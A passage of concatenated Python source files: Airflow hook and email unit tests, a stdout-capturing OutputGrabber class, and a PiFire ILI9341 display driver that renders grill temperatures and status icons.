def test_dbapi_get_sqlalchemy_engine(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
engine = hook.get_sqlalchemy_engine()
self.assertIsInstance(engine, sqlalchemy.engine.Engine)
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', str(engine.url))
def test_get_connections_env_var(self):
conns = SqliteHook.get_connections(conn_id='test_uri')
assert len(conns) == 1
assert conns[0].host == 'ec2.compute.com'
assert conns[0].schema == 'the_database'
assert conns[0].login == 'username'
assert conns[0].password == 'password'
assert conns[0].port == 5432
def test_get_connections_db(self):
conns = BaseHook.get_connections(conn_id='airflow_db')
assert len(conns) == 1
assert conns[0].host == 'localhost'
assert conns[0].schema == 'airflow'
assert conns[0].login == 'root'
class WebHDFSHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
def test_simple_init(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook()
self.assertIsNone(c.proxy_user)
def test_init_proxy_user(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook(proxy_user='someone')
self.assertEqual('someone', c.proxy_user)
HDFSHook = None
if six.PY2:
from airflow.hooks.hdfs_hook import HDFSHook
import snakebite
@unittest.skipIf(HDFSHook is None,
"Skipping test because HDFSHook is not installed")
class HDFSHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
os.environ['AIRFLOW_CONN_HDFS_DEFAULT'] = 'hdfs://localhost:8020'
def test_get_client(self):
client = HDFSHook(proxy_user='foo').get_conn()
self.assertIsInstance(client, snakebite.client.Client)
self.assertEqual('localhost', client.host)
self.assertEqual(8020, client.port)
self.assertEqual('foo', client.service.channel.effective_user)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_autoconfig_client(self, mock_get_connections,
MockAutoConfigClient):
c = models.Connection(conn_id='hdfs', conn_type='hdfs',
host='localhost', port=8020, login='foo',
extra=json.dumps({'autoconfig': True}))
mock_get_connections.return_value = [c]
HDFSHook(hdfs_conn_id='hdfs').get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user='foo',
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
def test_get_autoconfig_client_no_conn(self, MockAutoConfigClient):
HDFSHook(hdfs_conn_id='hdfs_missing', autoconfig=True).get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user=None,
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_ha_client(self, mock_get_connections):
c1 = models.Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost', port=8020)
c2 = models.Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost2', port=8020)
mock_get_connections.return_value = [c1, c2]
client = HDFSHook().get_conn()
self.assertIsInstance(client, snakebite.client.HAClient)
send_email_test = mock.Mock()
class EmailTest(unittest.TestCase):
def setUp(self):
configuration.conf.remove_option('email', 'EMAIL_BACKEND')
@mock.patch('airflow.utils.email.send_email')
def test_default_backend(self, mock_send_email):
res = utils.email.send_email('to', 'subject', 'content')
mock_send_email.assert_called_with('to', 'subject', 'content')
self.assertEqual(mock_send_email.return_value, res)
@mock.patch('airflow.utils.email.send_email_smtp')
def test_custom_backend(self, mock_send_email):
configuration.conf.set('email', 'EMAIL_BACKEND', 'tests.core.send_email_test')
utils.email.send_email('to', 'subject', 'content')
send_email_test.assert_called_with(
'to', 'subject', 'content', files=None, dryrun=False,
cc=None, bcc=None, mime_charset='utf-8', mime_subtype='mixed')
self.assertFalse(mock_send_email.called)
class EmailSmtpTest(unittest.TestCase):
def setUp(self):
configuration.conf.set('smtp', 'SMTP_SSL', 'False')
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name])
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
filename = u'attachment; filename="' + os.path.basename(attachment.name) + '"'
self.assertEqual(filename, msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp_with_multibyte_content(self, mock_send_mime):
utils.email.send_email_smtp('to', 'subject', '🔥', mime_charset='utf-8')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
msg = call_args[2]
mimetext = MIMEText('🔥', 'mixed', 'utf-8')
self.assertEqual(mimetext.get_payload(), msg.get_payload()[0].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_bcc_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name], cc='cc', bcc='bcc')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to', 'cc', 'bcc'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
self.assertEqual(u'attachment; filename="' + os.path.basename(attachment.name) + '"',
msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime(self, mock_smtp, mock_smtp_ssl):
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
msg = MIMEMultipart()
utils.email.send_MIME_email('from', 'to', msg, dryrun=False)
mock_smtp.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
self.assertTrue(mock_smtp.return_value.starttls.called)
mock_smtp.return_value.login.assert_called_with(
configuration.conf.get('smtp', 'SMTP_USER'),
configuration.conf.get('smtp', 'SMTP_PASSWORD'),
)
mock_smtp.return_value.sendmail.assert_called_with('from', 'to', msg.as_string())
self.assertTrue(mock_smtp.return_value.quit.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_ssl(self, mock_smtp, mock_smtp_ssl):
configuration.conf.set('smtp', 'SMTP_SSL', 'True')
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp.called)
mock_smtp_ssl.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_noauth(self, mock_smtp, mock_smtp_ssl):
configuration.conf.remove_option('smtp', 'SMTP_USER')
configuration.conf.remove_option('smtp', 'SMTP_PASSWORD')
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp_ssl.called)
mock_smtp.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
self.assertFalse(mock_smtp.login.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_dryrun(self, mock_smtp, mock_smtp_ssl):
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=True)
self.assertFalse(mock_smtp.called)
self.assertFalse(mock_smtp_ssl.called)
if __name__ == '__main__':
unittest.main()
|
outputgrabber.py
|
import os
import sys
import threading
import time
# Credits to craymichael
# https://stackoverflow.com/questions/24277488/in-python-how-to-capture-the-stdout-from-a-c-shared-library-to-a-variable # noqa
class OutputGrabber(object):
"""
Class used to grab standard output or another stream.
"""
escape_char = "\b"
def __init__(self, stream=None, threaded=False):
self.origstream = stream
self.threaded = threaded
if self.origstream is None:
self.origstream = sys.stdout
self.origstreamfd = self.origstream.fileno()
self.capturedtext = ""
# Create a pipe so the stream can be captured:
self.pipe_out, self.pipe_in = os.pipe()
def __enter__(self):
self.start()
return self
def __exit__(self, type, value, traceback):
self.stop()
def start(self):
"""
Start capturing the stream data.
"""
self.capturedtext = ""
# Save a copy of the stream:
self.streamfd = os.dup(self.origstreamfd)
# Replace the original stream with our write pipe:
os.dup2(self.pipe_in, self.origstreamfd)
if self.threaded:
# Start thread that will read the stream:
self.workerThread = threading.Thread(target=self.readOutput)
self.workerThread.start()
# Make sure that the thread is running and os.read() has executed:
time.sleep(0.01)
def stop(self):
"""
Stop capturing the stream data and save the text in `capturedtext`.
"""
# Print the escape character to make the readOutput method stop:
self.origstream.write(self.escape_char)
# Flush the stream to make sure all our data goes in before
# the escape character:
self.origstream.flush()
if self.threaded:
            # wait until the thread finishes so we are sure that
            # everything up to the last character has been captured:
self.workerThread.join()
else:
self.readOutput()
# Close the pipe:
os.close(self.pipe_in)
os.close(self.pipe_out)
# Restore the original stream:
os.dup2(self.streamfd, self.origstreamfd)
# Close the duplicate stream:
os.close(self.streamfd)
def readOutput(self):
"""
Read the stream data (one byte at a time)
and save the text in `capturedtext`.
"""
while True:
char = os.read(self.pipe_out, 1).decode(self.origstream.encoding)
if not char or self.escape_char in char:
break
self.capturedtext += char
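# Minimal usage sketch (an illustrative addition, not part of the original
# module): wrap the code whose output you want to capture in the context
# manager, then read `capturedtext` after the block exits. The print() call is
# only a stand-in for such code.
if __name__ == '__main__':
    with OutputGrabber(sys.stdout) as grabber:
        print("hello from inside the grabber")
    # stdout has been restored at this point; the captured text is available.
    sys.stdout.write("captured: %r\n" % grabber.capturedtext)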
|
display_ili9341.py
|
#!/usr/bin/env python3
'''
*****************************************
PiFire Display Interface Library
*****************************************
Description:
  This library supports the ILI9341 display with a
  240(H) x 320(W) resolution. It uses Luma.LCD to
  interface with this display.
*****************************************
'''
'''
Imported Libraries
'''
import time
import socket
import qrcode
import threading
from luma.core.interface.serial import spi
from luma.lcd.device import ili9341
from PIL import Image, ImageDraw, ImageFont
'''
Display class definition
'''
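# Hedged usage sketch (an illustrative addition, not part of the original
# module): the Display class starts its own display loop thread in __init__,
# so callers are assumed to construct it once and then push state/commands
# into it, roughly along these lines (attribute names taken from the loop
# below; the exact public entry points may differ in the full PiFire code):
#
#   display = Display(rotation=0, units='F')
#   display.displaycommand = 'network'   # or 'text' / 'splash' / 'clear'
#   display.in_data = in_data            # dict with GrillTemp, GrillSetPoint, Probe1Temp, ...
#   display.status_data = status_data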
class Display:
def __init__(self, buttonslevel='HIGH', rotation=0, units='F'):
# Init Global Variables and Constants
self.rotation = rotation
self.units = units
self.displayactive = False
self.in_data = None
self.status_data = None
self.displaytimeout = None
self.displaycommand = 'splash'
# Init Display Device, Input Device, Assets
self._init_globals()
self._init_assets()
self._init_display_device()
def _init_globals(self):
# Init constants and variables
self.WIDTH = 320
self.HEIGHT = 240
self.inc_pulse_color = True
self.icon_color = 100
self.fan_rotation = 0
self.auger_step = 0
def _init_display_device(self):
# Init Device
self.serial = spi(port=0, device=0, gpio_DC=24, gpio_RST=25, bus_speed_hz=32000000, reset_hold_time=0.2, reset_release_time=0.2)
self.device = ili9341(self.serial, active_low=False, width=self.WIDTH, height=self.HEIGHT, gpio_LIGHT=5, rotate=self.rotation)
# Setup & Start Display Loop Thread
display_thread = threading.Thread(target=self._display_loop)
display_thread.start()
def _display_loop(self):
'''
Main display loop
'''
while True:
if self.displaytimeout:
if time.time() > self.displaytimeout:
self.displaycommand = 'clear'
if self.displaycommand == 'clear':
self.displayactive = False
self.displaytimeout = None
self.displaycommand = None
self._display_clear()
if self.displaycommand == 'splash':
self.displayactive = True
self._display_splash()
self.displaytimeout = time.time() + 3
self.displaycommand = None
time.sleep(3) # Hold splash screen for 3 seconds
if self.displaycommand == 'text':
self.displayactive = True
self._display_text()
self.displaycommand = None
self.displaytimeout = time.time() + 10
if self.displaycommand == 'network':
self.displayactive = True
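                    # Determine the local IP address by connect()-ing a UDP
                    # socket toward a public address (no packets are actually
                    # sent for a SOCK_DGRAM connect).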
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
networkip = s.getsockname()[0]
if (networkip != ''):
self._display_network(networkip)
self.displaytimeout = time.time() + 30
self.displaycommand = None
else:
self.display_text("No IP Found")
if self.displayactive:
if not self.displaytimeout:
if (self.in_data is not None) and (self.status_data is not None):
self._display_current(self.in_data, self.status_data)
time.sleep(0.1)
'''
============== Graphics / Display / Draw Methods =============
'''
def _init_assets(self):
self._init_background()
self._init_splash()
def _init_background(self):
self.background = Image.open('background.jpg')
self.background = self.background.resize((self.WIDTH, self.HEIGHT))
def _init_splash(self):
self.splash = Image.open('color-boot-splash.png')
(self.splash_width, self.splash_height) = self.splash.size
self.splash_width *= 2
self.splash_height *= 2
self.splash = self.splash.resize((self.splash_width, self.splash_height))
def _rounded_rectangle(self, draw, xy, rad, fill=None):
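        # Build a rounded rectangle from two overlapping axis-aligned
        # rectangles (one inset vertically, one inset horizontally by `rad`)
        # plus four quarter-circle pie slices of radius `rad` in the corners.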
x0, y0, x1, y1 = xy
draw.rectangle([(x0, y0 + rad), (x1, y1 - rad)], fill=fill)
draw.rectangle([(x0 + rad, y0), (x1 - rad, y1)], fill=fill)
draw.pieslice([(x0, y0), (x0 + rad * 2, y0 + rad * 2)], 180, 270, fill=fill)
draw.pieslice([(x1 - rad * 2, y1 - rad * 2), (x1, y1)], 0, 90, fill=fill)
draw.pieslice([(x0, y1 - rad * 2), (x0 + rad * 2, y1)], 90, 180, fill=fill)
draw.pieslice([(x1 - rad * 2, y0), (x1, y0 + rad * 2)], 270, 360, fill=fill)
return (draw)
def _create_icon(self, charid, size, color):
# Get font and character size
font = ImageFont.truetype("FA-Free-Solid.otf", size)
# Create canvas
iconcanvas = Image.new('RGBa', font.getsize(charid))
# Create drawing object
draw = ImageDraw.Draw(iconcanvas)
draw.text((0, 0), charid, font=font, fill=color)
iconcanvas = iconcanvas.crop(iconcanvas.getbbox())
return(iconcanvas)
def _paste_icon(self, icon, canvas, position, rotation, bgcolor):
# First fill the background
bgfill = ImageDraw.Draw(canvas)
# Rotate the icon
icon = icon.rotate(rotation)
(icon_width, icon_height) = icon.size
#bgfill.rectangle([(position[0], position[1]), (position[0] + icon_width, position[1] + icon_height)], fill=bgcolor)
# Set the position & paste the icon onto the canvas
canvas.paste(icon, position, icon)
return(canvas)
def _draw_fan_icon(self, canvas):
# F = Fan (Upper Left)
icon_char = '\uf863'
icon_color = (0, self.icon_color, 255)
drawing = ImageDraw.Draw(canvas)
# Draw Rounded Rectangle Border
drawing = self._rounded_rectangle(drawing, (
self.WIDTH // 8 - 22, self.HEIGHT // 6 - 22, self.WIDTH // 8 + 22, self.HEIGHT // 6 + 22), 5,
icon_color)
# Fill Rectangle with Black
drawing = self._rounded_rectangle(drawing, (
self.WIDTH // 8 - 20, self.HEIGHT // 6 - 20, self.WIDTH // 8 + 20, self.HEIGHT // 6 + 20), 5,
(0, 0, 0))
# Create Icon Image
icon = self._create_icon(icon_char, 36, icon_color)
position = (self.WIDTH // 8 - 18, self.HEIGHT // 6 - 18)
canvas = self._paste_icon(icon, canvas, position, self.fan_rotation, (0,0,0))
return(canvas)
def _draw_auger_icon(self, canvas):
# A = Auger (Center Left)
icon_char = '\uf101'
icon_color_tuple = (0, self.icon_color, 0)
# Create a drawing object
drawing = ImageDraw.Draw(canvas)
# Draw Rounded Rectangle Border
drawing = self._rounded_rectangle(drawing, (
self.WIDTH // 8 - 22, self.HEIGHT // 2.5 - 22, self.WIDTH // 8 + 22, self.HEIGHT // 2.5 + 22), 5,
icon_color_tuple)
# Fill Rectangle with Black
drawing = self._rounded_rectangle(drawing, (
self.WIDTH // 8 - 20, self.HEIGHT // 2.5 - 20, self.WIDTH // 8 + 20, self.HEIGHT // 2.5 + 20), 5,
(0, 0, 0))
# Create Icon Image
icon = self._create_icon(icon_char, 36, icon_color_tuple)
(icon_width, icon_height) = icon.size
position = ((self.WIDTH // 8 - 18) + (icon_width // 8) + self.auger_step, (int(self.HEIGHT // 2.5) - 18) + (icon_height // 3))
canvas = self._paste_icon(icon, canvas, position, 0, (0,0,0))
return(canvas)
def _display_clear(self):
self.device.clear()
self.device.backlight(False)
self.device.hide()
def _display_canvas(self, canvas):
# Display Image
self.device.backlight(True)
self.device.show()
self.device.display(canvas)
def _display_splash(self):
# Create canvas
img = Image.new('RGB', (self.WIDTH, self.HEIGHT), color=(0, 0, 0))
# Set the position & paste the splash image onto the canvas
position = ((self.WIDTH - self.splash_width) // 2, (self.HEIGHT - self.splash_height) // 2)
img.paste(self.splash, position)
self._display_canvas(img)
def _display_text(self):
# Create canvas
img = Image.new('RGB', (self.WIDTH, self.HEIGHT), color=(0, 0, 0))
# Create drawing object
draw = ImageDraw.Draw(img)
font = ImageFont.truetype("impact.ttf", 42)
(font_width, font_height) = font.getsize(self.displaydata)
draw.text((self.WIDTH // 2 - font_width // 2, self.HEIGHT // 2 - font_height // 2), self.displaydata, font=font, fill=255)
self._display_canvas(img)
def _display_network(self, networkip):
# Create canvas
img = Image.new('RGB', (self.WIDTH, self.HEIGHT), color=(255, 255, 255))
img_qr = qrcode.make('http://' + networkip)
img_qr_width, img_qr_height = img_qr.size
img_qr_width *= 2
img_qr_height *= 2
w = min(self.WIDTH, self.HEIGHT)
new_image = img_qr.resize((w, w))
position = (int((self.WIDTH/2)-(w/2)), 0)
img.paste(new_image, position)
self._display_canvas(img)
def _display_current(self, in_data, status_data):
# Create canvas
img = Image.new('RGB', (self.WIDTH, self.HEIGHT), color=(0, 0, 0))
# Set the position and paste the background image onto the canvas
position = (0, 0)
img.paste(self.background, position)
# Create drawing object
draw = ImageDraw.Draw(img)
# Grill Temp Circle
draw.ellipse((80, 10, 240, 170), fill=(50, 50, 50)) # Grey Background Circle
if in_data['GrillTemp'] < 0:
endpoint = 0
elif self.units == 'F':
endpoint = ((360 * in_data['GrillTemp']) // 600) + 90
else:
endpoint = ((360 * in_data['GrillTemp']) // 300) + 90
draw.pieslice((80, 10, 240, 170), start=90, end=endpoint, fill=(200, 0, 0)) # Red Arc for Temperature
if (in_data['GrillSetPoint'] > 0):
if self.units == 'F':
setpoint = ((360 * in_data['GrillSetPoint']) // 600) + 90
else:
setpoint = ((360 * in_data['GrillSetPoint']) // 300) + 90
draw.pieslice((80, 10, 240, 170), start=setpoint - 2, end=setpoint + 2,
fill=(255, 255, 0)) # Yellow Arc for SetPoint
draw.ellipse((90, 20, 230, 160), fill=(0, 0, 0)) # Black Circle for Center
# Grill Temp Label
font = ImageFont.truetype("trebuc.ttf", 16)
text = "Grill"
(font_width, font_height) = font.getsize(text)
draw.text((self.WIDTH // 2 - font_width // 2, 20), text, font=font, fill=(255, 255, 255))
# Grill Set Point (Small Centered Top)
if (in_data['GrillSetPoint'] > 0):
font = ImageFont.truetype("trebuc.ttf", 16)
text = ">" + str(in_data['GrillSetPoint'])[:5] + "<"
(font_width, font_height) = font.getsize(text)
draw.text((self.WIDTH // 2 - font_width // 2, 45 - font_height // 2), text, font=font,
fill=(0, 200, 255))
# Grill Temperature (Large Centered)
if (self.units == 'F'):
font = ImageFont.truetype("trebuc.ttf", 80)
text = str(in_data['GrillTemp'])[:5]
(font_width, font_height) = font.getsize(text)
draw.text((self.WIDTH // 2 - font_width // 2, 40), text, font=font, fill=(255, 255, 255))
else:
font = ImageFont.truetype("trebuc.ttf", 55)
text = str(in_data['GrillTemp'])[:5]
(font_width, font_height) = font.getsize(text)
draw.text((self.WIDTH // 2 - font_width // 2, 56), text, font=font, fill=(255, 255, 255))
# Draw Grill Temp Scale Label
text = "°" + self.units
font = ImageFont.truetype("trebuc.ttf", 24)
(font_width, font_height) = font.getsize(text)
draw.text((self.WIDTH // 2 - font_width // 2, self.HEIGHT // 2 - font_height // 2 + 10), text, font=font,
fill=(255, 255, 255))
# PROBE1 Temp Circle
draw.ellipse((10, self.HEIGHT // 2 + 10, 110, self.HEIGHT // 2 + 110), fill=(50, 50, 50))
if in_data['Probe1Temp'] < 0:
endpoint = 0
elif self.units == 'F':
endpoint = ((360 * in_data['Probe1Temp']) // 300) + 90
else:
endpoint = ((360 * in_data['Probe1Temp']) // 150) + 90
draw.pieslice((10, self.HEIGHT // 2 + 10, 110, self.HEIGHT // 2 + 110), start=90, end=endpoint,
fill=(3, 161, 252))
if (in_data['Probe1SetPoint'] > 0):
if self.units == 'F':
setpoint = ((360 * in_data['Probe1SetPoint']) // 300) + 90
else:
setpoint = ((360 * in_data['Probe1SetPoint']) // 150) + 90
draw.pieslice((10, self.HEIGHT // 2 + 10, 110, self.HEIGHT // 2 + 110), start=setpoint - 2,
end=setpoint + 2, fill=(255, 255, 0)) # Yellow Arc for SetPoint
draw.ellipse((20, self.HEIGHT // 2 + 20, 100, self.HEIGHT // 2 + 100), fill=(0, 0, 0))
# PROBE1 Temp Label
font = ImageFont.truetype("trebuc.ttf", 16)
text = "Probe-1"
(font_width, font_height) = font.getsize(text)
draw.text((60 - font_width // 2, self.HEIGHT // 2 + 40 - font_height // 2), text, font=font,
fill=(255, 255, 255))
# PROBE1 Temperature (Large Centered)
if (self.units == 'F'):
font = ImageFont.truetype("trebuc.ttf", 36)
else:
font = ImageFont.truetype("trebuc.ttf", 30)
text = str(in_data['Probe1Temp'])[:5]
(font_width, font_height) = font.getsize(text)
draw.text((60 - font_width // 2, self.HEIGHT // 2 + 60 - font_height // 2), text, font=font,
fill=(255, 255, 255))
# PROBE1 Set Point (Small Centered Bottom)
if (in_data['Probe1SetPoint'] > 0):
font = ImageFont.truetype("trebuc.ttf", 16)
text = ">" + str(in_data['Probe1SetPoint'])[:5] + "<"
(font_width, font_height) = font.getsize(text)
draw.text((60 - font_width // 2, self.HEIGHT // 2 + 85 - font_height // 2), text, font=font,
fill=(0, 200, 255))
# PROBE2 Temp Circle
draw.ellipse((self.WIDTH - 110, self.HEIGHT // 2 + 10, self.WIDTH - 10, self.HEIGHT // 2 + 110),
fill=(50, 50, 50))
if in_data['Probe2Temp'] < 0:
endpoint = 0
elif self.units == 'F':
endpoint = ((360 * in_data['Probe2Temp']) // 300) + 90
else:
endpoint = ((360 * in_data['Probe2Temp']) // 150) + 90
draw.pieslice((self.WIDTH - 110, self.HEIGHT // 2 + 10, self.WIDTH - 10, self.HEIGHT // 2 + 110), start=90,
end=endpoint, fill=(3, 161, 252))
if (in_data['Probe2SetPoint'] > 0):
if self.units == 'F':
setpoint = ((360 * in_data['Probe2SetPoint']) // 300) + 90
else:
setpoint = ((360 * in_data['Probe2SetPoint']) // 150) + 90
draw.pieslice((self.WIDTH - 110, self.HEIGHT // 2 + 10, self.WIDTH - 10, self.HEIGHT // 2 + 110),
start=setpoint - 2, end=setpoint + 2, fill=(255, 255, 0)) # Yellow Arc for SetPoint
draw.ellipse((self.WIDTH - 100, self.HEIGHT // 2 + 20, self.WIDTH - 20, self.HEIGHT // 2 + 100),
fill=(0, 0, 0))
# PROBE2 Temp Label
font = ImageFont.truetype("trebuc.ttf", 16)
text = "Probe-2"
(font_width, font_height) = font.getsize(text)
draw.text((self.WIDTH - 60 - font_width // 2, self.HEIGHT // 2 + 40 - font_height // 2), text, font=font,
fill=(255, 255, 255))
# PROBE2 Temperature (Large Centered)
if (self.units == 'F'):
font = ImageFont.truetype("trebuc.ttf", 36)
else:
font = ImageFont.truetype("trebuc.ttf", 30)
text = str(in_data['Probe2Temp'])[:5]
(font_width, font_height) = font.getsize(text)
draw.text((self.WIDTH - 60 - font_width // 2, self.HEIGHT // 2 + 60 - font_height // 2), text, font=font,
fill=(255, 255, 255))
# PROBE2 Set Point (Small Centered Bottom)
if (in_data['Probe2SetPoint'] > 0):
font = ImageFont.truetype("trebuc.ttf", 16)
text = ">" + str(in_data['Probe2SetPoint'])[:5] + "<"
(font_width, font_height) = font.getsize(text)
draw.text((self.WIDTH - 60 - font_width // 2, self.HEIGHT // 2 + 85 - font_height // 2), text,
font=font, fill=(0, 200, 255))
# Active Outputs
''' Test of pulsing color '''
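        # The block below oscillates self.icon_color in steps of 20, bouncing between
        # roughly 100 and 220, so the active-output icons pulse slightly on every refresh.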
if self.inc_pulse_color == True:
if self.icon_color < 200:
self.icon_color += 20
else:
self.inc_pulse_color = False
self.icon_color -= 20
else:
if self.icon_color < 100:
self.inc_pulse_color = True
self.icon_color += 20
else:
self.icon_color -= 20
font = ImageFont.truetype("FA-Free-Solid.otf", 36)
if (status_data['outpins']['fan'] == 0):
# F = Fan (Upper Left), 40x40, origin 10,10
self._draw_fan_icon(img)
self.fan_rotation += 30
if self.fan_rotation >= 360:
self.fan_rotation = 0
if (status_data['outpins']['igniter'] == 0):
# I = Igniter(Center Right)
text = '\uf46a'
(font_width, font_height) = font.getsize(text)
draw = self._rounded_rectangle(draw, (
7 * (self.WIDTH // 8) - 22, self.HEIGHT // 2.5 - 22, 7 * (self.WIDTH // 8) + 22,
self.HEIGHT // 2.5 + 22), 5, (255, self.icon_color, 0))
draw = self._rounded_rectangle(draw, (
7 * (self.WIDTH // 8) - 20, self.HEIGHT // 2.5 - 20, 7 * (self.WIDTH // 8) + 20,
self.HEIGHT // 2.5 + 20), 5, (0, 0, 0))
draw.text((7 * (self.WIDTH // 8) - font_width // 2, self.HEIGHT // 2.5 - font_height // 2), text,
font=font, fill=(255, self.icon_color, 0))
if (status_data['outpins']['auger'] == 0):
# A = Auger (Center Left)
self._draw_auger_icon(img)
self.auger_step += 1
if self.auger_step >= 3:
self.auger_step = 0
# Notification Indicator (Right)
show_notify_indicator = False
for item in status_data['notify_req']:
if status_data['notify_req'][item] == True:
show_notify_indicator = True
if (show_notify_indicator == True):
font = ImageFont.truetype("FA-Free-Solid.otf", 36)
text = '\uf0f3'
(font_width, font_height) = font.getsize(text)
draw = self._rounded_rectangle(draw, (
7 * (self.WIDTH // 8) - 22, self.HEIGHT // 6 - 22, 7 * (self.WIDTH // 8) + 22,
self.HEIGHT // 6 + 22),
5, (255, 255, 0))
draw = self._rounded_rectangle(draw, (
7 * (self.WIDTH // 8) - 20, self.HEIGHT // 6 - 20, 7 * (self.WIDTH // 8) + 20,
self.HEIGHT // 6 + 20),
5, (0, 0, 0))
draw.text((7 * (self.WIDTH // 8) - font_width // 2 + 1, self.HEIGHT // 6 - font_height // 2), text,
font=font, fill=(255, 255, 0))
        # Smoke Plus Indicator
if (status_data['s_plus'] == True) and (
(status_data['mode'] == 'Smoke') or (status_data['mode'] == 'Hold')):
draw = self._rounded_rectangle(draw, (
7 * (self.WIDTH // 8) - 22, self.HEIGHT // 2.5 - 22, 7 * (self.WIDTH // 8) + 22,
self.HEIGHT // 2.5 + 22), 5, (150, 0, 255))
draw = self._rounded_rectangle(draw, (
7 * (self.WIDTH // 8) - 20, self.HEIGHT // 2.5 - 20, 7 * (self.WIDTH // 8) + 20,
self.HEIGHT // 2.5 + 20), 5, (0, 0, 0))
font = ImageFont.truetype("FA-Free-Solid.otf", 32)
text = '\uf0c2' # FontAwesome Icon for Cloud (Smoke)
(font_width, font_height) = font.getsize(text)
draw.text((7 * (self.WIDTH // 8) - font_width // 2, self.HEIGHT // 2.5 - font_height // 2), text,
font=font, fill=(100, 0, 255))
font = ImageFont.truetype("FA-Free-Solid.otf", 24)
text = '\uf067' # FontAwesome Icon for PLUS
(font_width, font_height) = font.getsize(text)
draw.text((7 * (self.WIDTH // 8) - font_width // 2, self.HEIGHT // 2.5 - font_height // 2 + 3), text,
font=font, fill=(0, 0, 0))
# Grill Hopper Level (Lower Center)
font = ImageFont.truetype("trebuc.ttf", 16)
text = "Hopper:" + str(status_data['hopper_level']) + "%"
(font_width, font_height) = font.getsize(text)
if (status_data['hopper_level'] > 70):
hopper_color = (0, 255, 0)
elif (status_data['hopper_level'] > 30):
hopper_color = (255, 150, 0)
else:
hopper_color = (255, 0, 0)
draw = self._rounded_rectangle(draw, (
self.WIDTH // 2 - font_width // 2 - 7, 156 - font_height // 2, self.WIDTH // 2 + font_width // 2 + 7,
166 + font_height // 2), 5, hopper_color)
draw = self._rounded_rectangle(draw, (
self.WIDTH // 2 - font_width // 2 - 5, 158 - font_height // 2, self.WIDTH // 2 + font_width // 2 + 5,
164 + font_height // 2), 5, (0, 0, 0))
draw.text((self.WIDTH // 2 - font_width // 2, 160 - font_height // 2), text, font=font, fill=hopper_color)
# Current Mode (Bottom Center)
font = ImageFont.truetype("trebuc.ttf", 36)
text = status_data['mode'] # + ' Mode'
(font_width, font_height) = font.getsize(text)
draw = self._rounded_rectangle(draw, (
self.WIDTH // 2 - font_width // 2 - 7, self.HEIGHT - font_height - 2,
self.WIDTH // 2 + font_width // 2 + 7,
self.HEIGHT - 2), 5, (3, 161, 252))
draw = self._rounded_rectangle(draw, (
self.WIDTH // 2 - font_width // 2 - 5, self.HEIGHT - font_height, self.WIDTH // 2 + font_width // 2 + 5,
self.HEIGHT - 4), 5, (255, 255, 255))
draw.text((self.WIDTH // 2 - font_width // 2, self.HEIGHT - font_height - 6), text, font=font,
